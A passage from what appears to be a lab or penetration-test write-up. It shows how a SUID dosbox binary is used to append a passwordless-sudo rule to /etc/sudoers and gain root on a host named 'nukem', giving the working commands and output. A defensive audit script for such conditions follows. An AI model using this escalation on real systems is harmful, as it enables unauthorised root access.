dosbox
The earlier attempt to escalate privileges by leveraging the SUID dosbox binary to overwrite the /etc/passwd
file failed due to the system not spawning a shell session.
[http@nukem http]$ sudo
usage: sudo -h | -K | -k | -V
usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user]
[command]
usage: sudo [-AbEHknPS] [-C num] [-D directory] [-g group] [-h host] [-p
prompt] [-R directory] [-T timeout] [-u user] [VAR=value] [-i|-s]
[<command>]
usage: sudo -e [-AknS] [-C num] [-D directory] [-g group] [-h host] [-p prompt]
[-R directory] [-T timeout] [-u user] file ...
sudo exists on the target system.
This would mean that I can attempt to overwrite the sudoers file.
[http@nukem http]$ LFILE='/etc/sudoers'
[http@nukem http]$ /usr/bin/dosbox -c 'mount c /' -c "echo http ALL=(ALL) NOPASSWD: ALL >> sudoers >>c:$LFILE" -c exit
ALSA lib confmisc.c:767:(parse_card) cannot find card '0'
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_card_driver returned error: No such file or directory
ALSA lib confmisc.c:392:(snd_func_concat) error evaluating strings
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_concat returned error: No such file or directory
ALSA lib confmisc.c:1246:(snd_func_refer) error evaluating name
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_refer returned error: No such file or directory
ALSA lib conf.c:5231:(snd_config_expand) Evaluate error: No such file or directory
ALSA lib pcm.c:2660:(snd_pcm_open_noupdate) Unknown PCM default
DOSBox version 0.74-3
Copyright 2002-2019 DOSBox Team, published under GNU GPL.
---
CONFIG: Using default settings. Create a configfile to change them
MIXER:Can't open audio: No available audio device , running in nosound mode.
ALSA:Can't subscribe to MIDI port (65:0) nor (17:0)
MIDI:Opened device:none
SHELL:Redirect output to c:/etc/sudoers
Overwrite successful
[http@nukem simple-file-list]$ sudo -i
whoami
root
hostname
nukem
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:9e:97:60 brd ff:ff:ff:ff:ff:ff
altname enp11s0
inet 192.168.113.105/24 brd 192.168.113.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:fe9e:9760/64 scope link
valid_lft forever preferred_lft forever
System-level compromise
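
Added example (not part of the original notes): a shell check for the two conditions the escalation above depended on, a SUID dosbox binary and an unrestricted NOPASSWD rule in sudoers. The function names, WATCHLIST and the sample sudoers text are constructed for illustration.

```shell
#!/bin/sh
# Added example: defender-side checks for the two conditions in these notes.
# Function names, WATCHLIST and the sample sudoers text are constructed.

# SUID binaries that can write arbitrary files; dosbox is the one on this page.
WATCHLIST="dosbox"

# Print watch-listed SUID files found under the given directories.
suid_watchlist_hits() {
    find "$@" -xdev -type f -perm -4000 2>/dev/null | while read -r path; do
        for name in $WATCHLIST; do
            if [ "$(basename "$path")" = "$name" ]; then echo "$path"; fi
        done
    done
}

# Print each principal holding an unrestricted passwordless rule, i.e.
# "<who> ALL=(ALL) NOPASSWD: ALL". Reads a sudoers file ($1) or stdin.
audit_sudoers() {
    awk '
        /\\$/ { sub(/\\$/, ""); buf = buf $0; next }   # join continued lines
        { $0 = buf $0; buf = "" }
        /^[ \t]*#/ { next }                             # commented-out lines
        $1 ~ /^Defaults/ { next }                       # settings, not rules
        /=[ \t]*\(ALL(:[ \t]*ALL)?\)[ \t]*NOPASSWD:[ \t]*ALL[ \t]*$/ { print $1 }
    ' "${1:--}"
}

# Constructed sample; the "http" rule is the line appended in the notes above.
sample_sudoers() {
    cat <<'EOF'
root ALL=(ALL:ALL) ALL
# http ALL=(ALL) NOPASSWD: ALL
Defaults env_reset
backup ALL=(root) NOPASSWD: /usr/bin/rsync
ci ALL=(ALL) \
    NOPASSWD: ALL
http ALL=(ALL) NOPASSWD: ALL
EOF
}

sample_sudoers | audit_sudoers   # prints: ci, http (one per line)
```

On a live host, run audit_sudoers as root against /etc/sudoers and each file in /etc/sudoers.d, and suid_watchlist_hits against the binary directories.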